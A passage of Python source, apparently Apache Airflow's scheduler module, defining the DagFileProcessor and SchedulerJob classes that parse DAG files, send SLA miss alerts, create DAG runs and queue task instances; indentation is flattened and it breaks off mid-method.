from airflow.ti_deps.dep_context import DepContext, QUEUE_DEPS
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.jobs.base_job import BaseJob
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path, pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
emails = set()
for task in dag.tasks:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
# this needs a fresh session sometimes tis get detached
tis = run.get_task_instances(state=(State.NONE,
State.UP_FOR_RETRY,
State.UP_FOR_RESCHEDULE))
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_state: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_state will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
states_to_count_as_running = [State.RUNNING, State.QUEUED]
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=states_to_count_as_running, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = (timezone.utcnow()
if not task_instance.queued_dttm
else task_instance.queued_dttm)
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
